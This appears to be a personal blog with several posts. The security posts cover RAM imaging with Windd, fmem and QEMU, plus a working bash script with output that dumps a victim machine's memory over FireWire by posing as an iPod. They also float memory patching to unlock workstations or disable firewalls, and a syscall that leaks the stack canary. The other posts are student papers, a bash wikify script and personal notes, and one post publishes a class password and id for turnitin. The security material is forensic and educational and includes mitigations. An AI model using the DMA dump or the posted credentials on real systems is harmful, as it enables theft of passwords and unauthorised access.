Imaging RAM using Windd, /dev/fmem or QEmu

While using FireWire to obtain RAM is pretty convenient and powerful, one might still consider a different method to capture it. A reason might be the absence of a FireWire port or driver, or simply that the necessary cable or software is missing. Another, more interesting, scenario is the analysis of a system's behaviour, e.g. how the memory differs between a locked and an unlocked workstation.

Windd

Using FireWire is not the only method to get at the RAM. If you want to image Windows' RAM, you could consider running a program, e.g. Windd, on the victim's machine which simply dumps all memory to disk. You might have some problems running it though:

Error: InstallDriver cannot start service (Err=0x00000002)
Error: Cannot open \\.\win32dd

This not-very-helpful error message wants you to move the .sys file to %WINDIR%\SYSTEM32 and to search for and delete windd references in the Registry.

When you try to use Windd with a normal, non-administrator account, you'll find that elevated privileges are needed to run the executable:

    -> Error: win32dd requires Administrator privileges

If you are faced with a PC that is logged in with a non-administrative account, as is typical in a business environment, the Windows runas command needs to be used to run Win32dd with the rights of either a local or a domain administrator account:

runas /user:Administrator "Win32dd.exe /f c:\images\memorydump"

When using runas you'll notice that a full path needs to be specified for the image file. Without specifying a path, Windd saves the RAM image into the %WINDIR%\system32 directory instead of the current directory as you might have expected.

The fmem Kernel Module

Although Linux provides a /dev/mem file, one cannot read the whole physical RAM through it. To make Linux expose the RAM via a file, one can load the fmem kernel module and use dd to obtain the contents of the physical memory address space, e.g. dd if=/dev/fmem of=memdump bs=1048576 count=1024 to obtain one gigabyte of memory.
I tried using cat to dump the RAM but found that it reads past the end of the physical memory. This is a known bug in fmem which the author notes in the README file provided with the module.

To be able to load the module, it first needs to be downloaded and compiled: a normal untar, a make, and then running the supplied run.sh script to install it. These steps are pretty straightforward.
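The whole workflow can be sketched as follows. The archive name and the exact behaviour of run.sh are assumptions based on common fmem releases; the dd arithmetic itself is demonstrated against /dev/zero so the snippet runs without root or the module loaded:

```shell
# Assumed workflow (requires root and the fmem sources):
#   tar xzf fmem_1.6-0.tgz && cd fmem_1.6-0
#   make && sudo sh run.sh    # builds and insmods fmem.ko, creating /dev/fmem
#   sudo dd if=/dev/fmem of=memdump bs=1048576 count=1024   # 1 GiB dump
# The dd arithmetic, runnable anywhere: bs * count = total bytes read.
dd if=/dev/zero of=memdump bs=1048576 count=4 2>/dev/null
wc -c < memdump   # 4 * 1048576 = 4194304 bytes
```

The bs=1048576 block size keeps the number of read() calls low; with count=1024 that yields exactly one gigabyte.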

Using QEmu to save RAM

QEmu is a virtualisation solution that allows dumping the RAM of the guest into a file using the pmemsave command. I think this deserves attention because it can be used to prepare attacks using the FireWire technique. That technique allows patching the memory of a running (Windows) system, which in turn can be used to, say, unlock a password-protected workstation. While unlocking has been done for a Windows XP SP2 system, no publicly available tools do that for a later Windows system.

With QEmu, we are able to run a target system, say Windows XP SP3, and take two memory dumps: the first while the machine is locked, and the second right after unlocking. By looking at the difference, we might be able to tell which data has to be modified in what way in order to remotely unlock the machine. This technique can also be used to, say, disable a firewall, elevate privileges or even inject new processes into the running system. It is noteworthy that this method is operating-system independent for both the host and the guest, because QEmu is free software which runs on many platforms and can itself run many operating systems.
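The diffing step can be sketched like this. The dump names and the guest's memory size are assumptions, and tiny stand-in files are created here so the comparison runs without QEMU:

```shell
# In the QEMU monitor one would take the two snapshots first, e.g.
# for a guest with 1 GiB of RAM:
#   (qemu) pmemsave 0 0x40000000 locked.dump      # while the box is locked
#   (qemu) pmemsave 0 0x40000000 unlocked.dump    # right after unlocking
# Stand-in dumps so the diff below is runnable as-is:
printf 'AAAA' > locked.dump
printf 'ABAA' > unlocked.dump
# cmp -l prints one line per differing byte: offset (1-based),
# old value and new value (both octal). cmp exits non-zero on differences.
cmp -l locked.dump unlocked.dump || true
```

For real gigabyte-sized dumps you would pipe the cmp output into further scripting rather than read it by hand, but the principle is the same: each output line is a candidate byte the lock state depends on.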

Reading RAM using FireWire

Recently, I had to obtain the Random Access Memory (RAM) of a Windows XP SP3 system. The RAM is storage for (program) data but, unlike a hard disk, it is around a million times faster and volatile. That is, its contents vanish within a few seconds after the machine is powered off. But as the RAM holds data of the running kernel and of almost every running program, it contains valuable information about the state of a machine, including passwords, running processes, open connections and registry data.

However, manually obtaining the RAM contents usually involves altering the state of the machine, because the system has to either run a special program (and running programs modifies the state) or load a special FireWire driver (and loading drivers off the disk into memory alters the machine's state). Even hibernating the system modifies the machine because files are written, memory might get compressed, etc. It is possible to obtain the contents of the RAM by cooling the chips down and quickly putting them into a system which keeps refreshing the data so that it can be read with one's own system. This method, however, requires a lot of preparation, skill and luck, because every second matters. But even if you manage to save the RAM, you might get into trouble because the examined system will still have a CPU cache which might keep the system up and running, potentially noticing the loss of RAM and changing the contents of the disk (i.e. erasing it). Since a Windows (Vista) kernel is around 9.9MiB in size, it would not necessarily fit into the 2MiB cache which modern CPUs have, but a Linux (2.6.29) kernel can be 1.7MiB in size, which would fit perfectly. Other, smaller kernels such as L4 or QNX exist.

I, however, went with the FireWire method, just because I thought it's fun to snarf another machine's memory using just a cable 🙂

FireWire was developed by Apple and standardised in 1995 for high-speed data transmission. By design, it is able to read and write the host machine's memory directly. This feature can be exploited to dump the machine's memory.

However, to dump Windows' memory via FireWire, one needs to convince Windows that the connected device is eligible to do so, by pretending to be, e.g., a proprietary and expensive audio player called "iPod".

Using existing tools, it is relatively easy to dump Windows' memory.
One needs to download and build pythonraw1394 and the necessary dependencies.
Then the proper tools, which basically configure the Linux host to be an iPod and dump the victim machine's memory, must be run.
The following script should do all the necessary steps and finally save a 2GB memory dump in a temporary directory.
It is known to work on an Ubuntu 9.10 Linux system.

#!/bin/bash
 
DIR=/tmp/$RANDOM
PYTHONRAW=http://www.storm.net.nz/static/files/pythonraw1394-1.0.tar.gz
LOCALPORT=0
REMOTEPORT=1
NODE=0
 
mkdir -p $DIR && cd $DIR &&
  wget --continue -O- $PYTHONRAW | tar xvf - &&
  cd pythonraw1394/ &&
  sudo apt-get install -y libraw1394 libraw1394-dev swig python-dev build-essential &&
  sed -i 's/python2\.3/python2\.6/g' Makefile &&
  make &&
  sudo modprobe raw1394 &&
  sudo chgrp $USER /dev/raw1394 &&
  ./businfo &&
  ./romtool -g $LOCALPORT $DIR/localport.csr &&
  ./romtool -s $LOCALPORT ipod.csr &&
  ./1394memimage $REMOTEPORT $NODE $DIR/memdump 0 2G &&
  echo Success, please read the memory at $DIR/memdump || echo Failure

(I’ve just finished packaging that up for Ubuntu)

As for mitigation, the best option would be to have no FireWire ports 😉 But it'd be a stupid thing to rip out your FireWire ports or put lots of glue into them, because FireWire is a nice technology that you want to use for your external hard drives, cameras, networking, etc. So simply deactivate the driver if you don't need it! A plugged-in device then cannot make use of the functionality. For Linux, rmmod ohci1394 should be sufficient. To make this permanent, you might want to add "blacklist ohci1394" to your /etc/modprobe.d/blacklist. If you then want to use some FireWire device, simply modprobe ohci1394.

Using the above-mentioned script, we successfully saved the memory contents of a Windows XP SP3 machine into a temporary directory.
In our case, it took around 500 seconds to capture 1024 MiB of RAM. Interestingly enough, when reading more RAM than is installed in the victim's machine, the program puts 0xffs in the dump file. We rebooted the machine from Windows into Linux and read the RAM again; reading RAM from a machine running Linux (2.6.31) works fine as well. We found it interesting that we were still able to read memory of the Windows system which we had shut down properly. So Windows left artefacts behind which we were able to read.

Note that the machine whose RAM we read ran a Linux kernel which did not make use of the most recent FireWire stack, simply because it had not been officially released yet. It will be interesting to see how and under which circumstances the new FireWire stack, called Juju, allows the RAM to be read and written.

For completeness, we also tried reading the RAM of a Laptop running MacOS and it worked equally well.

muelli@xbox:/tmp/pythonraw1394$ ionice -c 3 ./1394memimage 0 1 /tmp/windows.mem 0-1G
1394memimage v1.0 Adam Boileau, 2006.
Init firewire, port 0 node 1
Reading 0x3fd00000 (1045504KiB) at 2027 KiB/s...
1073741824 bytes read
Elapsed time 517.51 seconds
Writing metadata and hashes...
muelli@xbox:/tmp/pythonraw1394$ volatility ident -f windows.mem
              Image Name: windows.mem
              Image Type: Service Pack 3
                 VM Type: nopae
                     DTB: 0x39000
                Datetime: Mon Mar 22 19:06:42 2010
muelli@xbox:/tmp/pythonraw1394$

It might be interesting for future research to remotely change Windows' memory to, say, unlock a password-protected workstation, change the configuration of a firewall or even inject new processes. Although we consider it very interesting to build a tiny appliance that does the memory dump of the victim's machine, we could not find anything like it on the Internet. Given that products on the forensic market are pretty expensive, building such a machine might be very rewarding.

MSN Shutdown in 2003

During CA640 I had to write an ethical review which I was supposed to hand in using a dodgy web service. Since it got 90%, people urged me to make it available 😉 Of course, I don't have a problem with that, so people now have a reference and know what to expect when they enter the course.

You can find the PDF here and its abstract reads:

At the end of 2003 Microsoft closed the public chat-rooms of its Internet service called MSN.
Microsoft was pushed by children's charities because they feared abuse of these chat-rooms.
In some countries, however, the service remained available, but subject to a charge.
This review raises ethical questions about Microsoft's and the children's charities' behaviour, because making people pay with the excuse of protecting children is considered ethically questionable.
Also, the children's charities pushed for the closure of a heavily used service although there is no evidence that children would be safer after closing down a chat-room.

If you are not interested in the non-technical details, you might be interested to know that I use a Mercurial hook on the server side to automatically compile the LaTeX sources once I push changes to the server:

$ cat .hg/hgrc
[hooks]
changegroup.compile = export FILE=paper && hg up -C && pdflatex --interaction=batchmode $FILE && bibtex $FILE && pdflatex --interaction=batchmode $FILE && pdflatex --interaction=batchmode $FILE

And then I just symlink the resulting PDF file to my public_html directory.
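That last step is a one-liner; a minimal sketch, assuming the repository lives under $HOME/essay and FILE=paper as in the hook above:

```shell
# Link the freshly compiled PDF into public_html so the web server
# always serves the latest build ($HOME/essay is an assumed path).
mkdir -p "$HOME/public_html"
ln -sf "$HOME/essay/paper.pdf" "$HOME/public_html/paper.pdf"
```

Because it is a symlink rather than a copy, every subsequent push (and recompile) is immediately visible on the web without any further step.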

Digital Divide

As a student, I have to write a term paper every now and then. Since I am firmly convinced that university, science and knowledge should be as free as possible, and since everybody potentially funds my studies by paying taxes, I think everybody has the right to at least see what I actually do all day long.

Thanks to the Internet, it is rather easy nowadays to publish things and carry knowledge onwards. Hence you can find here a term paper which I wrote last semester in Gender Studies.

Alien Toilet Sign

The paper is called "Weiblicher Zugang zu Technik und feministische Politiken" (female access to technology and feminist politics) and its abstract reads as follows:

The reasons leading to the digital divide are manifold, and gender is one of them.
Female groups, too, pursue the goal of increasing the proportion of female participants in the digital realm.
This paper analyses how this goal is supposed to be achieved, why it does not succeed and how it might perhaps be achieved after all.

The PDF is available here and is licensed for everybody under the Creative Commons "Attribution-NonCommercial-ShareAlike 3.0 Germany" licence. That does not mean, however, that I cannot license it differently on request.

The paper reads somewhat bumpily in places, which is owed to its genesis: essentially, 2.5 papers were merged into one. I hope it is not too bad nevertheless.

Should the PDF not be that exciting content-wise, it is still worth paying attention to the technical details. The PDF knows how its content is licensed. For that, it uses XMP streams which are embedded into the PDF. They got into the PDF via LaTeX with the hyperxmp package. Officially, xmpincl is still recommended, but that one is really nasty to use, because you have to create the XMP stream yourself.

\usepackage{hyperxmp}         % To be have an XMP Data Stream f.e. to include the license
[...]
\hypersetup{
        pdftitle={Weiblicher Zugang zu Technik und feministische Politiken},
        pdfauthor={Tobias Mueller},
        [...]
        pdfcopyright={This work is licensed to the public under the Creative Commons Attribution-Non-Commercial-Share Alike 3.0 Germany License.},
        pdflicenseurl={http://creativecommons.org/licenses/by-nc-sa/3.0/de/}
}

My Evince 2.29.1 (built with JHBuild) happily shows the licence information; Okular 0.9.2 does not. I do not know of any other way to view XMP data embedded in a PDF. It would certainly be interesting for automated processing.

Many thanks to Chillum and Sourci, who supported me with advice and patches and who are probably sick of the text by now 😉

The comment function is probably rather ill-suited for a discussion of the content, but for lack of alternatives it is available for that purpose. I like the solution the Djangobook uses: next to every paragraph there is a comment function which works very well.

Adding Linux Syscall

In a course (CA644) we were asked to add a new syscall to the Linux kernel.

Linux Oxi Power!

As I believe that knowledge should be as free and as accessible as possible, I thought I should at least publish our results. Another (though minor) reason is that society, to some extent, pays for me doing science, so I believe that society deserves to at least see the results.

The need to actually publish this is not very big, since a lot of information on how to do it exists already. However, most of it is outdated. A good article is the one by macboy, but it fails to mention a minor fact: the syscall() function is variadic, so it takes as many arguments as you give it.

So the abstract of the paper, that I’ve written together with Nosmo, reads:

This paper shows how to build a recent Linux kernel from scratch, how to add a new system call to it and how to implement new functionality easily.
The chosen functionality is to retrieve the stack protecting canary so that mitigation of buffer overflow attacks can be circumvented.

And you can download the PDF here.

If it’s not interesting for you content-wise, it might be interesting from a technical point of view: the PDF has files attached, so that you don’t need to do the boring stuff yourself but can rather save the working files and modify them. That is achieved using the embedfile package.

\usepackage{embedfile}        % Provides \embedfile[filename=foo, desc={bar}]{file}
[...]
\embedfile[filespec=writetest.c, mimetype=text/x-c,desc={Program which uses the new systemcall}]{../code/userland/writetest.c}%

If your PDF client doesn’t let you save the files (Evince does 🙂), you might want to run pdftk $PDF unpack_files in some empty directory.

Why I cannot use turnitin.com

We were supposed to use a proprietary web service to hand in a paper:

You should also upload the essay to turnitin.com using the password key:

5vu0h5fw and id: 2998602

Late entries will suffer a penalty.

I cannot use this service. The simplest reason being that I cannot agree to their ToS.

Let me clarify just by picking some of their points off their ToS:

By clicking the “I agree — create profile” button below You: (1) represent that You have read and understand

As I am a native speaker of neither English nor law-speak, I cannot agree that I fully understand those ToS.

With the exception of the limited license granted below, nothing contained herein shall be construed as granting You any right, […]

Whatever that means, it sounds scary to me.

You further represent that You are not barred from receiving the Services or using the Site under the laws of the United States or other applicable jurisdiction.

I am sorry but I do not know whether this holds for me.

You may not modify, copy, distribute, transmit, display, perform, reproduce, publish, license, create derivative works from, transfer, or sell any information, Licensed Programs or Services from the Site without the prior written consent of iParadigms,

Lucky me that I have not agreed to their ToS yet, so I can copy them and bring them up here…

You further agree not to cause or permit the disassembly, decompilation, recompilation, or reverse engineering of any Licensed Program or technology underlying the Site. In jurisdictions where a right to reverse engineer is provided by law unless information is available about products in order to achieve interoperability, functional compatibility, or similar objectives, You agree to submit a detailed written proposal to iParadigms concerning any information You need for such purposes before engaging in reverse engineering.

I seriously do not want to write a proposal to this company for every new website I build just because they use a <form> or some AJAX.

You are entirely responsible for maintaining the confidentiality of Your password

I cannot do that because I do not even know how they store my password (we are talking about an ASP program after all…).

You agree to use reasonable efforts to retain the confidentiality of class identification numbers and passwords. In no circumstance shall You transmit or make Your password or class identification number or any other passwords for the Site or class identification numbers available in any public forum, including, but not limited to any web page, blog, advertisement or other posting on the Internet, any public bulletin board, and any file that is accessible in a peer-to-peer network.

Yeah, sure. Nobody will find it on the page itself anyway.

This User Agreement is governed by the laws of the State of California, U.S.A. You hereby consent to the exclusive jurisdiction and venue of state and federal courts in Alameda County, California, U.S.A., in all disputes arising out of or relating to the use of the Site or the Services.

Might sound weird, but I do not want to be arraigned in the USA.

You agree not to use the Site in any jurisdiction that does not give effect to all provisions of these terms and conditions, including without limitation this paragraph.

Of course, I do not know enough about this jurisdiction to agree to those ToS.

Needless to say that I do not want my data to fall under the American PATRIOT Act.

Besides the above-mentioned legal issues, I also have ethical concerns about contributing to the profit of a dodgy company by providing them with my essay so that they can check other works against mine. If I believed in copyright, I could probably claim infringement as well.

Other topics, such as the violation of the presumption of innocence, are covered by resources on the web, and there are plenty of them. The most interesting ones include this and this.

Admittedly, I could care less than I do, but being an academic also means thinking critically.

I more or less sent this email to the lecturer and it turned out that it’s not compulsory to use this dodgy service! *yay*

The future, however, is not safe yet, so more action is needed…

Wikify Pages

In one of our modules, “System Software”, we were asked to write a bash script which wikifies a page. That means identifying all proper nouns and replacing them with a link to Wikipedia.

I managed to write that up in two hours or so and I think I have a not-so-ugly solution (*cough* it’s still bash… *cough*). It has (major) drawbacks though. In valid X(HT)ML, e.g.

<![CDATA[ <body>

before the actual body will be recognized as the beginning. But parsing XML with plain bash is not that easy.

Also, my script at first did not parse the payload correctly: it tailed all the way down to the end of the file instead of stopping when </body> was reached (the culprit was a tail that should have been a head).

Anyway, here’s the script:

#!/bin/bash
### A script which tries to Wikipediafy a given HTML page
### That means that every proper noun is linked against the Wikipedia
### but only if it's not already linked against something.
### Assumptions are that the HTML file has a "<body>" tag on a separate
### line and that "<a>" tags don't span multiple lines.
### Also, capitalised words in XML tags are treated as payload words, just
### because parsing XML properly is a matter of 100k of shell script (consider
### parsing <![CDATA[!). This assumption is not too far off, because
### capitalised words in XML tags happen seldom anyway.
### As this is written in Bash, it is horribly slow. You'd rather want to do
### this in a language that actually understands {X,HT}ML, like Python
 
# You might want to change this
BASEURL="http://en.wikipedia.org/wiki/"
 
set -e
 
### Better not change anything below, it might kill kittens
# To break only on newlines, set the IFS to that
OLD_IFS=$IFS
IFS='
'
HTML=$(cat $1) # Read the file for performance reasons
# Find the beginning and end of Document and try to be permissive with HTML
# Errors by only stopping after hitting one <body> Tag
START_BODY=$(grep --max-count=1 -ni '<body>'<<<"$HTML" | cut -d: -f1)
END_BODY=$(grep --max-count=1 -ni '</body>'<<<"$HTML" | cut -d: -f1)
 
HEAD=$(head -n $START_BODY<<<"$HTML") # Extract the Head for later use
# $(()) is most probably a non-portable bashism, so one wants to get rid of that
RANGE_BODY=$(($END_BODY-$START_BODY))
 
# And then extract the body (head, not tail, so we stop at </body>)
PAYLOAD=$(tail -n +${START_BODY} <<<"$HTML" | head -n ${RANGE_BODY})
 
### This is the main part
### Basically search for all words beginning with a capital letter
### and match that. We can use that later with \1.
 
### Try to find already linked words, replace them by their MD5 hash,
### Run generic Word finding mechanism and replace back later
 
# We simply assume that a link doesn't span multiple lines
LINKMATCHES=$(grep -i -E --only-matching '<a .*>.*</a>' $1 || true)
 
LINKMATCH_ARRAY=()
MD5_ARRAY=()
CLEANEDPAYLOAD=$PAYLOAD
if [[ -n $LINKMATCHES ]]; then
    # We have found already linked words, put them into an array
    LINKMATCH_ARRAY=( $LINKMATCHES )
    index=0 # iterate over array
    for MATCH in $LINKMATCHES; do
        # Uniquely hash the found link and replace it, saving its origin
        MATCHMD5=$(md5sum <<<$MATCH | awk '{print $1}')
        MD5_ARRAY[$index]=$MATCHMD5
        # We simply assume that there's no "," in the match
        # Use Bash internals string replacement facilities
        CLEANEDPAYLOAD=${CLEANEDPAYLOAD//${MATCH}/${MATCHMD5}}
        let "index = $index + 1"
    done
fi
 
 
# Find the matches
WORDMATCHES=$(grep --only-matching '[A-Z][a-z][a-z]*'<<<$CLEANEDPAYLOAD | sort | uniq)
WORDMATCHES_ARRAY=( $WORDMATCHES )
index=0
WIKIFIED=$CLEANEDPAYLOAD
while [[ "$index" -lt ${#WORDMATCHES_ARRAY[@]} ]]; do
    # Yeah, iterating over an array with 300+ entries is fun *sigh*
    # You could now ask Wikipedia and only continue if the page exist
    # if wget -q "${BASEURL}${SEARCH}"; then ...; else ...; fi
    SEARCH="${WORDMATCHES_ARRAY[$index]}"
    REPLACE="<a href=\"${BASEURL}${SEARCH}\">\2</a>"
    # Note, that we replace the first occurence only
    #WIKIFIED=${WIKIFIED/$SEARCH/$REPLACE} ## That's horribly slow, so use sed
    # Watch out for a problem: "<p>King" shall match as well as "King</p>"
    # or "King." but not eBook.
    # We thus match the needle plus the previous/following char,
    # iff it's not [A-Za-z]
    WIKIFIED=$(sed -e "s,\([^A-Za-z]\)\($SEARCH\)\([^A-Za-z]\),\1$REPLACE\3,"<<<$WIKIFIED) # so use sed
    let "index += 1"
done
 
# Replace hashed links with their original, same as above, only reverse.
# One could apply this technique to other tags besides <a>, but you really
# want to write that in a proper language :P
index=0
NOLINKWIKIPEDIAFIED=$WIKIFIED
while [[ "$index" -lt ${#MD5_ARRAY[@]} ]]; do
    SEARCH=${MD5_ARRAY[$index]}
    REPLACE=${LINKMATCH_ARRAY[$index]}
    NOLINKWIKIPEDIAFIED=${NOLINKWIKIPEDIAFIED//$SEARCH/$REPLACE}
    let "index += 1"
done
 
### Since we have the head and the payload separate, echo both
echo $HEAD
echo $NOLINKWIKIPEDIAFIED
 
# Reset the IFS, e.g. for following scripts
IFS=$OLD_IFS

Taking the IELTS

As I said some time ago, I had to take an IELTS test in order to apply to DCU. I already have a kind of language test which I took for the DAAD, but it’s not good enough for DCU… So I bit the bullet and paid the Euros to take the IELTS.

I decided to go for the IELTS instead of the TOEFL because I was told that it’s friendlier and more comfortable to do. The TOEFL is a computer-based test, which can be very annoying.

The IELTS was held in a friendly but formal atmosphere. Everything, and I mean everything, had a rule you and the supervisors had to stick to. I wasn’t even allowed to take my keys into the examination room, not to mention my wallet.

The test itself went pretty well, especially the listening and reading parts. I didn’t manage to perform equally well on the writing part. These tests took a couple of hours and I was pretty happy to get some fresh air afterwards. I had three hours of spare time before the speaking test began. Actually, I was really nervous. I don’t know why, because there was nothing to be afraid of. I mean, even if I failed pretty hard, I could always redo the test. In the end, I managed to speak and the results are not that bad.

So I got a better result than I actually needed 🙂 One step closer to my application to DCU.

LaTeX Transcript of Records

As I want to go to Dublin this year, I have to apply to DCU. I have to list everything I have done so far at my university, and I asked our secretary whether we have English transcripts, because having them officially translated is really expensive. She sent me a Word document which I was supposed to fill out. Of course, I was not satisfied at all, because the document looked terrible.

So I decided to write an equivalent in LaTeX (compiled PDF). I learned a lot about multi-page tables and multi-row cells 😉 Because I want to share my knowledge and don’t want you to spend two days on it as I did, feel free to use it for whatever you like 🙂
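The two building blocks were the longtable and multirow packages; here is a minimal sketch of how they combine (module names and the column layout are made up for illustration, not the actual transcript):

```latex
\documentclass{article}
\usepackage{longtable}   % tables that may break across pages
\usepackage{multirow}    % cells spanning several rows
\begin{document}
\begin{longtable}{|l|l|r|}
\hline
Module & Part & ECTS \\ \hline
\endhead                 % this header repeats at the top of every page
\hline
\endfoot
\multirow{2}{*}{CS101} & Lecture & 4 \\
                       & Lab     & 2 \\ \hline
\end{longtable}
\end{document}
```

The \endhead/\endfoot declarations are what make a transcript spanning several pages keep its column headings, which a plain tabular cannot do.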


Update: New link to Transcript (with embedded TeX Source).

Bericht zur KIF

A short follow-up to the press release, which I do not want to leave standing as it is. For one thing, there is plenty of criticism of the Grundgesetz (the German constitution) itself, and for another, a few words about the KIF in Dortmund are in order.

KIF37.0 Logo

A summarising report on the KIF can be found in the FSR blog. I don't feel that there is much to add to it. It is not as nice to read as the one from last time, but it is well suited to give first-time KIF attendees an impression.

On the organisational side: the Dortmund organisers were rather uptight. In general, there seems to be a fanaticism about rules in Dortmund: when boarding a bus you must be able to show your ticket at any time, the bus driver will not make an exception and stop at an intermediate stop even in the middle of the night, and at the swimming pool you have to show your access card not only when entering but also when leaving. This hindered us quite a bit in our demo preparation phase: because we could not simply move the computers around on the table, because the staples were apparently an extremely valuable commodity, and because the karma was generally somehow bad, we burned a lot of our preparation time on finding alternative plans. What annoyed me most was that the organisers wanted a written (sic!) confirmation of the (verbally registered) demonstration, just to make sure that everything was legal. As I had an appointment with the police officers on site, i.e. in the city centre, I offered that an organiser could come along, since such a conversation between police officer and registrant proves pretty well that everything is above board. But for unknown reasons they would not agree to that.

Demo in the city

Whether the demonstration for fundamental rights was such a clever idea in the first place is an interesting question. Our Grundgesetz is much lauded and praised, but there certainly are critical voices which consider it deficient for various reasons. Telepolis has an informative article on the history of our constitution. The magazine also writes about the more intriguing criticism, and I think there really are some interesting points. I could enumerate them now, and dodgy academics would probably do just that, but I believe that the original quotes are the best source of knowledge 😛

Despite the criticism, I think that raising awareness was good and important. Our Grundgesetz may not be the best, but I would rather not live without codified fundamental rights.

Creative Commons Attribution-ShareAlike 3.0 Unported
This work by Muelli is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported.